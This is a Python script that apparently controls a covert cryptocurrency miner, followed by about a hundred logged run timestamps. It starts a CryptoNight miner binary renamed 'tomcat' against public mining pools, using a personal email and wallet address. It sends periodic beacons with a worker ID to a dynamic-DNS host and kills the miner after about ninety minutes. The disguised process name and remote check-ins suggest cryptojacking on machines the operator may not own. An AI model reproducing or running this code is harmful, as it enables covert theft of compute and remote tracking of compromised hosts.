import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:29:06.118317
#2018-02-17 16:16:05.385240
#2018-02-17 18:03:07.042764
#2018-02-17 19:52:04.152765
#2018-02-17 21:41:05.194419
#2018-02-17 23:25:07.411897
#2018-02-18 01:14:06.072610
#2018-02-18 03:02:01.726664
#2018-02-18 04:49:06.505373
#2018-02-18 06:40:08.861596
#2018-02-18 08:29:01.877278
#2018-02-18 10:16:07.028825
#2018-02-18 12:02:04.410777
#2018-02-18 13:47:04.103968
#2018-02-18 15:39:07.077754
#2018-02-18 17:29:06.529666
#2018-02-18 19:17:07.092479
#2018-02-18 21:03:06.071415
#2018-02-18 22:49:06.206159
#2018-02-19 00:38:06.760866
#2018-02-19 02:25:05.665824
#2018-02-19 04:12:03.593604
#2018-02-19 05:56:05.501743
#2018-02-19 08:03:08.004890
#2018-02-19 09:53:04.980961
#2018-02-19 11:41:09.498697
#2018-02-19 13:27:05.757531
#2018-02-19 15:16:02.136035
#2018-02-19 17:04:05.573978
#2018-02-19 18:51:04.200895
#2018-02-19 20:40:06.101910
#2018-02-19 22:26:08.465405
#2018-02-20 00:13:05.962367
#2018-02-20 02:02:04.544028
#2018-02-20 03:52:06.332661
#2018-02-20 05:37:06.248704
#2018-02-20 07:22:08.203998
#2018-02-20 09:09:02.061761
#2018-02-20 10:52:01.375114
#2018-02-20 12:39:01.817195
#2018-02-20 14:24:04.906004
#2018-02-20 16:07:09.954676
#2018-02-20 17:52:08.859223
#2018-02-20 19:44:05.044712
#2018-02-20 21:36:06.494533
#2018-02-20 23:17:07.561280
#2018-02-21 01:01:07.868535
#2018-02-21 02:48:01.888615
#2018-02-21 04:36:04.604964
#2018-02-21 06:23:07.112797
#2018-02-21 08:08:06.187852
#2018-02-21 09:54:04.797188
#2018-02-21 11:43:06.372239
#2018-02-21 13:33:04.486572
#2018-02-21 15:17:06.962512
#2018-02-21 17:08:15.167452
#2018-02-21 18:56:06.893022
#2018-02-21 20:45:11.198293
#2018-02-21 22:31:02.262550
#2018-02-22 00:21:07.289583
#2018-02-22 02:09:05.826674
#2018-02-22 03:54:02.170720
#2018-02-22 05:41:02.012847
#2018-02-22 07:26:02.195335
#2018-02-22 09:13:07.035381
#2018-02-22 11:01:08.204857
#2018-02-22 12:48:06.515344
#2018-02-22 14:34:04.356778
#2018-02-22 16:20:07.845695
#2018-02-22 18:06:11.109836
#2018-02-22 19:54:10.353806
#2018-02-22 21:43:05.980825
#2018-02-22 23:31:05.260521
#2018-02-23 01:18:07.446186
#2018-02-23 03:05:03.782863
#2018-02-23 04:53:06.804895
#2018-02-23 06:39:03.708800
#2018-02-23 08:27:06.457221
#2018-02-23 10:41:09.213948
#2018-02-23 12:39:07.530940
#2018-02-23 14:24:08.222760
#2018-02-23 16:15:06.475632
#2018-02-23 18:02:06.349275
#2018-02-23 19:47:04.912283
#2018-02-23 21:31:04.500711
#2018-02-23 23:18:06.143156
#2018-02-24 01:08:06.289745
#2018-02-24 02:59:07.003371
#2018-02-24 04:47:06.157818
#2018-02-24 06:34:02.143143
#2018-02-24 08:22:05.315392
#2018-02-24 10:06:06.146146
#2018-02-24 12:04:07.156039
#2018-02-24 13:51:07.942164
#2018-02-24 15:42:01.376739
#2018-02-24 17:35:07.623629
#2018-02-24 19:21:02.193678
#2018-02-24 21:11:06.329896
#2018-02-24 23:44:03.982405
#2018-02-25 03:06:02.050391
#2018-02-25 06:52:06.636681